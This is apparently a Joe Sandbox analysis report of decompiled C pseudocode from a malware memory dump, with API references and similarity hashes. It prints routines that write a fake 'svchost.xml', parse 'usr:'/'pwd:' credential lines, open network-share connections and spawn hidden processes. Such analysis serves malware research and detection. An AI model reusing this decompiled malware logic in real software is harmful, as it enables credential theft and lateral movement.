                                                											if(_t69 == _t98) {
                                                												_t69 = GetLastError();
                                                												if(_t69 == 0) {
                                                													 *(_t93 + _t98 * 2 - 2) = _t69;
                                                												}
                                                											}
                                                										}
                                                										return _t69;
                                                									}
                                                								}
                                                							}
                                                							goto L29;
                                                							L12:
                                                							_t91 = _t74;
                                                							__eflags = _t74 - 0xfffffffe;
                                                						} while (_t74 != 0xfffffffe);
                                                						__eflags = _t78;
                                                						if(_t78 != 0) {
                                                							goto L18;
                                                						}
                                                						goto L19;
                                                					}
                                                				}
                                                				L29:
                                                			}

                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 02FB308B
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 02FB3105
                                                  • Part of subcall function 02FC3930: __FindPESection.LIBCMT ref: 02FC3989
                                                • _ValidateLocalCookies.LIBCMT ref: 02FB3179
                                                • _ValidateLocalCookies.LIBCMT ref: 02FB31A4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentFindImageNonwritableSection
                                                • String ID: csm
                                                • API String ID: 1685366865-1018135373
                                                • Opcode ID: 39eb30acefa11b9670b68b7b4d0a07bca6b8947a6d355f67a39e06c58e2257ac
                                                • Instruction ID: 0f27fb603a4fc47aec503f493919b5eec14b403a4f886b59a5b2fdc4028ade30
                                                • Opcode Fuzzy Hash: 39eb30acefa11b9670b68b7b4d0a07bca6b8947a6d355f67a39e06c58e2257ac
                                                • Instruction Fuzzy Hash: 6A41E731E40208ABDF11DF6ACC50ADEBBBAAF447A8F14C199DA155B351CB31EA05CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 69%
                                                			E02FA72D0(void* __ebx, void* __ecx, void* __edx, void* __edi, intOrPtr _a4) {
                                                				signed int _v8;
                                                				char _v268;
                                                				void _v102668;
                                                				long _v102672;
                                                				void* __esi;
                                                				signed int _t16;
                                                				intOrPtr _t26;
                                                				int _t33;
                                                				void* _t39;
                                                				void* _t43;
                                                				intOrPtr _t50;
                                                				void* _t51;
                                                				void* _t55;
                                                				intOrPtr* _t56;
                                                				long _t57;
                                                				void* _t58;
                                                				void* _t59;
                                                				signed int _t60;
                                                
                                                				E02FC3CA0();
                                                				_t16 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t16 ^ _t60;
                                                				_t50 = _a4;
                                                				_t39 = __edx;
                                                				_t55 = __ecx;
                                                				E02FB3440(_t50,  &_v268, 0, 0x104);
                                                				E02FA5180( &_v268, 0x104, "%s\\svchost.xml", _t55);
                                                				E02FB3440(_t50,  &_v102668, 0, 0x19000);
                                                				_push(_t50);
                                                				E02FA5180( &_v102668, 0x19000,  *0x2fd682c, _t39);
                                                				_t56 =  &_v102668;
                                                				_t43 = _t56 + 1;
                                                				do {
                                                					_t26 =  *_t56;
                                                					_t56 = _t56 + 1;
                                                				} while (_t26 != 0);
                                                				_v102672 = 0;
                                                				_t57 = _t56 - _t43;
                                                				_t51 = CreateFileA( &_v268, 0x40000000, 2, 0, 2, 0x80, 0);
                                                				if(_t51 == 0) {
                                                					L5:
                                                					_pop(_t58);
                                                					return E02FB0A5D(_v8 ^ _t60, _t58);
                                                				} else {
                                                					_t33 = WriteFile(_t51,  &_v102668, _t57,  &_v102672, 0);
                                                					_push(_t51);
                                                					if(_t33 != 0) {
                                                						CloseHandle();
                                                						_pop(_t59);
                                                						return E02FB0A5D(_v8 ^ _t60, _t59);
                                                					} else {
                                                						CloseHandle();
                                                						goto L5;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000002,00000080,00000000), ref: 02FA737F
                                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02FA739D
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,02FA7878,WIN72K8R2), ref: 02FA73A8
                                                • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,02FA7878,WIN72K8R2), ref: 02FA73C1
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CloseFileHandle$CreateWrite
                                                • String ID: %s\svchost.xml
                                                • API String ID: 3602564925-772174823
                                                • Opcode ID: 20136221194b850006deac793918f2252c9bdb12835289927b3ffe994b8b3786
                                                • Instruction ID: ff7c16d75144cdf989adeb234fb2080a258723a8391242bcaeaefa9bafc91ca9
                                                • Opcode Fuzzy Hash: 20136221194b850006deac793918f2252c9bdb12835289927b3ffe994b8b3786
                                                • Instruction Fuzzy Hash: 5D21F671A8021DBADB20DA61DC59FDAB3BDDF45B84F5000D5FB48A7180CA72A9C48F60
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 71%
                                                			E02FB90F8(void* __ebx, void* __ecx, void* __edx) {
                                                				void* __edi;
                                                				void* __esi;
                                                				intOrPtr _t2;
                                                				void* _t3;
                                                				void* _t4;
                                                				intOrPtr _t9;
                                                				void* _t11;
                                                				void* _t20;
                                                				void* _t21;
                                                				void* _t23;
                                                				void* _t25;
                                                				void* _t27;
                                                				void* _t29;
                                                				void* _t31;
                                                				void* _t32;
                                                				long _t36;
                                                				long _t37;
                                                				void* _t40;
                                                
                                                				_t29 = __edx;
                                                				_t23 = __ecx;
                                                				_t20 = __ebx;
                                                				_t36 = GetLastError();
                                                				_t2 =  *0x2fd0558; // 0x6
                                                				_t42 = _t2 - 0xffffffff;
                                                				if(_t2 == 0xffffffff) {
                                                					L2:
                                                					_t3 = E02FB78D0(_t23, 1, 0x364);
                                                					_t31 = _t3;
                                                					_pop(_t25);
                                                					if(_t31 != 0) {
                                                						_t4 = E02FB7F1D(_t25, __eflags,  *0x2fd0558, _t31);
                                                						__eflags = _t4;
                                                						if(_t4 != 0) {
                                                							E02FB8F6A(_t25, _t31, 0x2fd6690);
                                                							E02FB7848(0);
                                                							_t40 = _t40 + 0xc;
                                                							__eflags = _t31;
                                                							if(_t31 == 0) {
                                                								goto L9;
                                                							} else {
                                                								goto L8;
                                                							}
                                                						} else {
                                                							_push(_t31);
                                                							goto L4;
                                                						}
                                                					} else {
                                                						_push(_t3);
                                                						L4:
                                                						E02FB7848();
                                                						_pop(_t25);
                                                						L9:
                                                						SetLastError(_t36);
                                                						E02FB7805(_t20, _t29, _t31, _t36);
                                                						asm("int3");
                                                						_push(_t20);
                                                						_push(_t36);
                                                						_push(_t31);
                                                						_t37 = GetLastError();
                                                						_t21 = 0;
                                                						_t9 =  *0x2fd0558; // 0x6
                                                						_t45 = _t9 - 0xffffffff;
                                                						if(_t9 == 0xffffffff) {
                                                							L12:
                                                							_t32 = E02FB78D0(_t25, 1, 0x364);
                                                							_pop(_t27);
                                                							if(_t32 != 0) {
                                                								_t11 = E02FB7F1D(_t27, __eflags,  *0x2fd0558, _t32);
                                                								__eflags = _t11;
                                                								if(_t11 != 0) {
                                                									E02FB8F6A(_t27, _t32, 0x2fd6690);
                                                									E02FB7848(_t21);
                                                									__eflags = _t32;
                                                									if(_t32 != 0) {
                                                										goto L19;
                                                									} else {
                                                										goto L18;
                                                									}
                                                								} else {
                                                									_push(_t32);
                                                									goto L14;
                                                								}
                                                							} else {
                                                								_push(_t21);
                                                								L14:
                                                								E02FB7848();
                                                								L18:
                                                								SetLastError(_t37);
                                                							}
                                                						} else {
                                                							_t32 = E02FB7EC7(_t25, _t45, _t9);
                                                							if(_t32 != 0) {
                                                								L19:
                                                								SetLastError(_t37);
                                                								_t21 = _t32;
                                                							} else {
                                                								goto L12;
                                                							}
                                                						}
                                                						return _t21;
                                                					}
                                                				} else {
                                                					_t31 = E02FB7EC7(_t23, _t42, _t2);
                                                					if(_t31 != 0) {
                                                						L8:
                                                						SetLastError(_t36);
                                                						return _t31;
                                                					} else {
                                                						goto L2;
                                                					}
                                                				}
                                                			}

                                                APIs
                                                • GetLastError.KERNEL32(123,?,02FB49AE,?,123,?,02FB7670,02FD0E80,123,?,73B76490,123,?,77109EB0), ref: 02FB90FC
                                                • SetLastError.KERNEL32(00000000,123,?,73B76490,123,?,77109EB0), ref: 02FB9164
                                                • SetLastError.KERNEL32(00000000,123,?,73B76490,123,?,77109EB0), ref: 02FB9170
                                                • _abort.LIBCMT ref: 02FB9176
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ErrorLast$_abort
                                                • String ID: 123
                                                • API String ID: 88804580-2286445522
                                                • Opcode ID: 0c6265963148f9cf0ee58eb450ce2e882d6dea7ae6633248146370037c91f6ee
                                                • Instruction ID: 3c7bef5a40019f2c83db0938c4bb31729ed2141b66a53aa1394969a4a418d5d3
                                                • Opcode Fuzzy Hash: 0c6265963148f9cf0ee58eb450ce2e882d6dea7ae6633248146370037c91f6ee
                                                • Instruction Fuzzy Hash: 58F0813BE8460566E61336376C0CFEA766B9FC27F1F350418FB19E6280EFA094119D61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,02FB65B3,00000002,?,02FB6553,00000002,02FCDED8,0000000C,02FB6666,00000002), ref: 02FB65DE
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 02FB65F1
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,02FB65B3,00000002,?,02FB6553,00000002,02FCDED8,0000000C,02FB6666,00000002), ref: 02FB6614
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 5e2f64f1adf7d3f5f6a4c2393444c761d5daa32a8165a28ae7474071228c6cd6
                                                • Instruction ID: 22593b9049c7cd45382ca20210d7b2014baa2f624e53db3fb1fce968b92ff68b
                                                • Opcode Fuzzy Hash: 5e2f64f1adf7d3f5f6a4c2393444c761d5daa32a8165a28ae7474071228c6cd6
                                                • Instruction Fuzzy Hash: F0F08C30E4420DBBEB129BA1D949BDEBBB9EF04796F600068A906E6240CB319950CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: connectgethostbynamehtonssocket
                                                • String ID:
                                                • API String ID: 3705698054-0
                                                • Opcode ID: 1572781591347c1afdb012644b479e6241c341b3da96fe0924a3c698651a0a85
                                                • Instruction ID: 9689e26c58563516fda03436f068e8702bc1b7bc569e62ebf0230b015aebb6dd
                                                • Opcode Fuzzy Hash: 1572781591347c1afdb012644b479e6241c341b3da96fe0924a3c698651a0a85
                                                • Instruction Fuzzy Hash: FB21A231A40209AFC711DFA8C905BEFF7F8FF55790F10416AEA05AB240DBB0AA108BD5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E02FA94A0(void* __ebx, signed int __ecx, signed int __edx, void* __edi, signed int _a4) {
                                                				signed int _v8;
                                                				char _v258;
                                                				char _v264;
                                                				char _v520;
                                                				intOrPtr _v524;
                                                				intOrPtr _v528;
                                                				intOrPtr _v532;
                                                				void* __esi;
                                                				void* __ebp;
                                                				signed int _t60;
                                                				void* _t67;
                                                				intOrPtr _t69;
                                                				void* _t74;
                                                				intOrPtr _t77;
                                                				intOrPtr _t82;
                                                				signed int _t84;
                                                				void* _t88;
                                                				intOrPtr _t90;
                                                				signed int _t91;
                                                				intOrPtr _t93;
                                                				void* _t95;
                                                				intOrPtr _t97;
                                                				void* _t98;
                                                				signed int _t101;
                                                				intOrPtr* _t105;
                                                				intOrPtr* _t106;
                                                				signed int _t107;
                                                				char _t108;
                                                				void* _t110;
                                                				void* _t111;
                                                				intOrPtr* _t112;
                                                				intOrPtr* _t114;
                                                				signed int _t117;
                                                				intOrPtr _t118;
                                                				signed int _t120;
                                                				void* _t121;
                                                				signed int _t122;
                                                				signed int _t124;
                                                				signed int _t125;
                                                				void* _t127;
                                                				signed int _t128;
                                                				void* _t129;
                                                				void* _t130;
                                                				void* _t131;
                                                				void* _t133;
                                                				void* _t134;
                                                
                                                				_t102 = __ecx;
                                                				_t60 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t60 ^ _t128;
                                                				_t101 = _a4;
                                                				_t117 = __edx;
                                                				_t118 = E02FB5E17(__ecx, "r");
                                                				_t130 = _t129 + 8;
                                                				_v524 = _t118;
                                                				_t135 = _t118;
                                                				if(_t118 == 0) {
                                                					L37:
                                                					return E02FB0A5D(_v8 ^ _t128, _t118);
                                                				}
                                                				E02FB3440(__edx,  &_v264, 0, 0x100);
                                                				_t67 = E02FB5FE9(_t135,  &_v264, 0x100, _t118);
                                                				_t131 = _t130 + 0x18;
                                                				if(_t67 == 0) {
                                                					L36:
                                                					_push(_t118);
                                                					E02FB5EA4(_t102, _t152);
                                                					goto L37;
                                                				} else {
                                                					do {
                                                						_t105 =  &_v264;
                                                						_t110 = _t105 + 1;
                                                						do {
                                                							_t69 =  *_t105;
                                                							_t105 = _t105 + 1;
                                                						} while (_t69 != 0);
                                                						_t102 = _t105 - _t110;
                                                						if(_t102 > 0x80 || _t102 < 6) {
                                                							L35:
                                                							_t118 = _v524;
                                                							goto L36;
                                                						} else {
                                                							E02FB76F4( &_v264, " usr: ", 6);
                                                							_t120 =  ==  ? 1 : 0;
                                                							_t74 = E02FB76F4( &_v264, " pwd: ", 6);
                                                							_t131 = _t131 + 0x18;
                                                							if(_t74 != 0) {
                                                								__eflags = _t120;
                                                								if(__eflags == 0) {
                                                									goto L35;
                                                								}
                                                								L10:
                                                								E02FB3440(_t117,  &_v520, 0, 0x100);
                                                								_t106 =  &_v264;
                                                								_t133 = _t131 + 0xc;
                                                								_t111 = _t106 + 1;
                                                								do {
                                                									_t77 =  *_t106;
                                                									_t106 = _t106 + 1;
                                                								} while (_t77 != 0);
                                                								_t102 = _t106 - _t111;
                                                								E02FC3DB0( &_v520,  &_v258, _t106 - _t111 - 7);
                                                								_t134 = _t133 + 0xc;
                                                								_t121 = _t120 - 1;
                                                								if(_t121 == 0) {
                                                									_t122 = 0;
                                                									__eflags =  *(_t117 + 0x20);
                                                									if(__eflags <= 0) {
                                                										L29:
                                                										_t82 = E02FB0A6E(_t122, __eflags, 0x100);
                                                										_t112 =  &_v520;
                                                										_v532 = _t82;
                                                										_t134 = _t134 + 4;
                                                										_t124 = _t82 - _t112;
                                                										__eflags = _t124;
                                                										do {
                                                											_t107 =  *_t112;
                                                											_t112 = _t112 + 1;
                                                											 *((char*)(_t124 + _t112 - 1)) = _t107;
                                                											__eflags = _t107;
                                                										} while (_t107 != 0);
                                                										_t102 = _t117;
                                                										_t84 = E02FA6F70(_t117);
                                                										__eflags = _t84;
                                                										if(_t84 != 0) {
                                                											_t102 =  *(_t117 + 0x20);
                                                											 *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x1c)) +  *(_t117 + 0x20) * 4)) = _v532;
                                                											_t53 = _t117 + 0x20;
                                                											 *_t53 =  *(_t117 + 0x20) + 1;
                                                											__eflags =  *_t53;
                                                										}
                                                										goto L33;
                                                									} else {
                                                										goto L25;
                                                									}
                                                									while(1) {
                                                										L25:
                                                										_t90 = 0;
                                                										__eflags = _t122 -  *(_t117 + 0x20);
                                                										if(_t122 <  *(_t117 + 0x20)) {
                                                											_t90 =  *((intOrPtr*)( *((intOrPtr*)(_t117 + 0x1c)) + _t122 * 4));
                                                										}
                                                										_t102 =  &_v520;
                                                										_t91 = E02FB7612(_t117, _t122, _t90,  &_v520);
                                                										_t134 = _t134 + 8;
                                                										__eflags = _t91;
                                                										if(_t91 == 0) {
                                                											goto L33;
                                                										}
                                                										_t122 = _t122 + 1;
                                                										__eflags = _t122 -  *(_t117 + 0x20);
                                                										if(__eflags < 0) {
                                                											continue;
                                                										}
                                                										goto L29;
                                                									}
                                                									goto L33;
                                                								}
                                                								_t125 = _t121 - 1;
                                                								if(_t125 != 0) {
                                                									goto L33;
                                                								}
                                                								if( *(_t101 + 0x20) <= _t125) {
                                                									L20:
                                                									_t93 = E02FB0A6E(_t125, _t149, 0x100);
                                                									_t114 =  &_v520;
                                                									_v528 = _t93;
                                                									_t134 = _t134 + 4;
                                                									_t127 = _t93 - _t114;
                                                									asm("o16 nop [eax+eax]");
                                                									do {
                                                										_t108 =  *_t114;
                                                										_t114 = _t114 + 1;
                                                										 *((char*)(_t127 + _t114 - 1)) = _t108;
                                                									} while (_t108 != 0);
                                                									_t102 = _t101;
                                                									_t95 = E02FA6F70(_t101);
                                                									_t151 = _t95;
                                                									if(_t95 != 0) {
                                                										_t102 =  *(_t101 + 0x20);
                                                										 *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x1c)) +  *(_t101 + 0x20) * 4)) = _v528;
                                                										 *(_t101 + 0x20) =  *(_t101 + 0x20) + 1;
                                                									}
                                                									goto L33;
                                                								}
                                                								while(1) {
                                                									_t97 = 0;
                                                									if(_t125 <  *(_t101 + 0x20)) {
                                                										_t97 =  *((intOrPtr*)( *((intOrPtr*)(_t101 + 0x1c)) + _t125 * 4));
                                                									}
                                                									_t102 =  &_v520;
                                                									_t98 = E02FB7612(_t117, _t125, _t97,  &_v520);
                                                									_t134 = _t134 + 8;
                                                									if(_t98 == 0) {
                                                										goto L33;
                                                									}
                                                									_t125 = _t125 + 1;
                                                									_t149 = _t125 -  *(_t101 + 0x20);
                                                									if(_t125 <  *(_t101 + 0x20)) {
                                                										continue;
                                                									}
                                                									goto L20;
                                                								}
                                                								goto L33;
                                                							}
                                                							_t10 = _t74 + 2; // 0x2
                                                							_t120 = _t10;
                                                							goto L10;
                                                						}
                                                						L33:
                                                						E02FB3440(_t117,  &_v264, 0, 0x100);
                                                						_t118 = _v524;
                                                						_t88 = E02FB5FE9(_t151,  &_v264, 0x100, _t118);
                                                						_t131 = _t134 + 0x18;
                                                						_t152 = _t88;
                                                					} while (_t88 != 0);
                                                					goto L36;
                                                				}
                                                			}

                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: pwd: $ usr:
                                                • API String ID: 0-3899161880
                                                • Opcode ID: c75959971beebcae6f9f3656a1d5cb98953fc744a3c7deb2469ea80035bcf418
                                                • Instruction ID: a9e923c4fd7c243f7450cbaac57187e76b2497e3fec31919b9028db7de0a7cf9
                                                • Opcode Fuzzy Hash: c75959971beebcae6f9f3656a1d5cb98953fc744a3c7deb2469ea80035bcf418
                                                • Instruction Fuzzy Hash: 3C61D4B5D002159BCF25DF64CD94BE9B3B9AF09384F0445E4DE49AB241E7B1EA44CF90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 70%
                                                			E02FAB0F0(intOrPtr* __ecx, char* __edx, void* __edi, char* _a4) {
                                                				signed int _v8;
                                                				char _v276;
                                                				char _v540;
                                                				char* _v560;
                                                				int _v576;
                                                				struct _NETRESOURCE _v580;
                                                				char* _v584;
                                                				char* _v588;
                                                				void* __esi;
                                                				signed int _t23;
                                                				intOrPtr* _t26;
                                                				char _t42;
                                                				intOrPtr* _t51;
                                                				void* _t56;
                                                				long _t57;
                                                				void* _t58;
                                                				void* _t59;
                                                				signed int _t60;
                                                				signed int _t62;
                                                				signed int _t63;
                                                
                                                				_t62 = (_t60 & 0xfffffff0) - 0x248;
                                                				_t23 =  *0x2fcf008; // 0x93ad1eea
                                                				_v8 = _t23 ^ _t62;
                                                				_t51 = __ecx;
                                                				_v584 = _a4;
                                                				_v588 = __edx;
                                                				_t26 = __ecx;
                                                				_t56 =  &_v540 - __ecx;
                                                				do {
                                                					_t42 =  *_t26;
                                                					_t26 = _t26 + 1;
                                                					 *((char*)(_t56 + _t26 - 1)) = _t42;
                                                				} while (_t42 != 0);
                                                				E02FAA2B0( &_v540);
                                                				E02FA3F90( &_v540,  &_v276, "\\\\%s",  &_v540);
                                                				_t63 = _t62 + 0xc;
                                                				asm("xorps xmm0, xmm0");
                                                				asm("movaps [esp+0x20], xmm0");
                                                				_v560 =  &_v276;
                                                				asm("movaps [esp+0x18], xmm0");
                                                				_v576 = 0;
                                                				_t57 = WNetAddConnection2A( &_v580, _v584, _v588, 0);
                                                				if(_t57 != 0) {
                                                					if(_t57 != 0x4c3) {
                                                						L6:
                                                						SetLastError(_t57);
                                                						_pop(_t58);
                                                						return E02FB0A5D(_v8 ^ _t63, _t58);
                                                					} else {
                                                						E02FAB1F0(_t51, _t57);
                                                						_t57 = WNetAddConnection2A( &_v580, _v584, _v588, 0);
                                                						if(_t57 == 0) {
                                                							goto L3;
                                                						} else {
                                                							goto L6;
                                                						}
                                                					}
                                                				} else {
                                                					L3:
                                                					_pop(_t59);
                                                					return E02FB0A5D(_v8 ^ _t63, _t59);
                                                				}
                                                			}
























                                                APIs
                                                • WNetAddConnection2A.MPR(?), ref: 02FAB180
                                                • SetLastError.KERNEL32(00000000), ref: 02FAB1CD
                                                  • Part of subcall function 02FAB1F0: WNetCancelConnection2A.MPR(?,00000000,00000001), ref: 02FAB24E
                                                • WNetAddConnection2A.MPR(?,?,?,00000000), ref: 02FAB1C0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Connection2$CancelErrorLast
                                                • String ID: \\%s
                                                • API String ID: 4062109977-3838199987
                                                • Opcode ID: 9d407ba60a4f230210df1cf7c1238327d68cdc9f46c02c874683069f347772ab
                                                • Instruction ID: 3d8ea790d03cc58bdd57a4aa06228231f2425e4dda0e887e7d33aa2fac27df2f
                                                • Opcode Fuzzy Hash: 9d407ba60a4f230210df1cf7c1238327d68cdc9f46c02c874683069f347772ab
                                                • Instruction Fuzzy Hash: EF21B4719083459BD721DF64D814BDBFBE9EFC9354F404A1EFA89D3250EB30A5088B82
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 91%
                                                			E02FAA630(void* __ecx, long __edx, WCHAR* _a4) {
                                                				long _v8;
                                                				int _t10;
                                                				void* _t16;
                                                				void* _t25;
                                                				long _t30;
                                                
                                                				_push(__ecx);
                                                				_t30 = __edx;
                                                				_t16 = __ecx;
                                                				if(__edx == 0 || __ecx == 0) {
                                                					return 0;
                                                				} else {
                                                					_t25 = CreateFileW(_a4, 0xc0000000, 0, 0, 2, 0, 0);
                                                					if(_t25 != 0xffffffff) {
                                                						_v8 = 0;
                                                						_t10 = WriteFile(_t25, _t16, _t30,  &_v8, 0);
                                                						CloseHandle(_t25);
                                                						if((_t16 & 0xffffff00 | _t10 != 0x00000000) == 0 || _v8 != _t30) {
                                                							return 0;
                                                						} else {
                                                							return 1;
                                                						}
                                                					} else {
                                                						return 0;
                                                					}
                                                				}
                                                			}









                                                APIs
                                                • CreateFileW.KERNEL32(02FAA81A,C0000000,00000000,00000000,00000002,00000000,00000000,?,745EC0B0,?,CONFIGURATION,?,02FAA81A,?), ref: 02FAA655
                                                • WriteFile.KERNEL32(00000000,CONFIGURATION,0000000D,?,00000000,?,745EC0B0,?,CONFIGURATION,?,02FAA81A), ref: 02FAA67B
                                                • CloseHandle.KERNEL32(00000000,?,745EC0B0,?,CONFIGURATION,?,02FAA81A), ref: 02FAA687
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$CloseCreateHandleWrite
                                                • String ID: CONFIGURATION
                                                • API String ID: 1065093856-2209261362
                                                • Opcode ID: a99966a55119d9e28cc9b91d26b09067edf41ed67e83d8ae40069b3216467fba
                                                • Instruction ID: d3f3fafe143127e702941d427f4e26b2201ea0bf594e1f6deeb8ea5012387040
                                                • Opcode Fuzzy Hash: a99966a55119d9e28cc9b91d26b09067edf41ed67e83d8ae40069b3216467fba
                                                • Instruction Fuzzy Hash: D801F932BD121877EB30896EBD45BEAB3ACD782B75F6001A6FE08D7380D6615C145990
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E02FA4F50(CHAR* __ecx, CHAR* __edx, void* __eflags, CHAR* _a4) {
                                                				struct _STARTUPINFOA _v72;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t17;
                                                				CHAR* _t20;
                                                				CHAR* _t23;
                                                				void* _t24;
                                                				struct _PROCESS_INFORMATION* _t25;
                                                				void* _t28;
                                                
                                                				_t28 = __eflags;
                                                				_t23 = __edx;
                                                				_t20 = __ecx;
                                                				E02FB3440(__edx,  &_v72, 0, 0x44);
                                                				_t25 = E02FB0A6E(_t24, _t28, 0x10);
                                                				E02FB3440(_t23,  &_v72, 0, 0x44);
                                                				asm("xorps xmm0, xmm0");
                                                				asm("movups [esi], xmm0");
                                                				GetStartupInfoA( &_v72);
                                                				_v72.cb = 0x44;
                                                				_v72.wShowWindow = 0;
                                                				_v72.dwFlags = 1;
                                                				_t17 = CreateProcessA(_t20, _t23, 0, 0, 0, 0x20, 0, _a4,  &_v72, _t25);
                                                				asm("sbb eax, eax");
                                                				return  ~_t17 & _t25;
                                                			}













                                                APIs
                                                • new.LIBCMT ref: 02FA4F6C
                                                • GetStartupInfoA.KERNEL32(?), ref: 02FA4F8D
                                                • CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000020,00000000,02FA985B,00000044,00000000,?,?,?,?,73BCF7E0,00000000), ref: 02FA4FBB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CreateInfoProcessStartup
                                                • String ID: D
                                                • API String ID: 525363069-2746444292
                                                • Opcode ID: ba47b3342c2f1139755ff6fbaf244471043241d33ab135e19253e8a18aa736a2
                                                • Instruction ID: 0bb99f9f1fd1a0c8218771b0f8c2dfa0aaa9ce7a74f9cc81bd5efabe91379468
                                                • Opcode Fuzzy Hash: ba47b3342c2f1139755ff6fbaf244471043241d33ab135e19253e8a18aa736a2
                                                • Instruction Fuzzy Hash: BA01D471E8030C76EB20DAA08D46FDEB7ACDF44B50F600525B708FA1C0E6B4BA508798
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 75%
                                                			E02FB932B(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				unsigned int _v20;
                                                				signed int _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				char _v40;
                                                				intOrPtr _v48;
                                                				char _v52;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* _t86;
                                                				signed int _t92;
                                                				signed int _t93;
                                                				signed int _t94;
                                                				signed int _t100;
                                                				void* _t101;
                                                				void* _t102;
                                                				void* _t104;
                                                				void* _t107;
                                                				void* _t109;
                                                				void* _t111;
                                                				void* _t115;
                                                				char* _t116;
                                                				void* _t119;
                                                				signed int _t121;
                                                				signed int _t128;
                                                				signed int* _t129;
                                                				signed int _t136;
                                                				signed int _t137;
                                                				char _t138;
                                                				signed int _t139;
                                                				signed int _t142;
                                                				signed int _t146;
                                                				signed int _t151;
                                                				char _t156;
                                                				char _t157;
                                                				void* _t161;
                                                				unsigned int _t162;
                                                				signed int _t164;
                                                				signed int _t166;
                                                				signed int _t170;
                                                				void* _t171;
                                                				signed int* _t172;
                                                				signed int _t174;
                                                				signed int _t181;
                                                				signed int _t182;
                                                				signed int _t183;
                                                				signed int _t184;
                                                				signed int _t185;
                                                				signed int _t186;
                                                				signed int _t187;
                                                
                                                				_t171 = __edx;
                                                				_t181 = _a24;
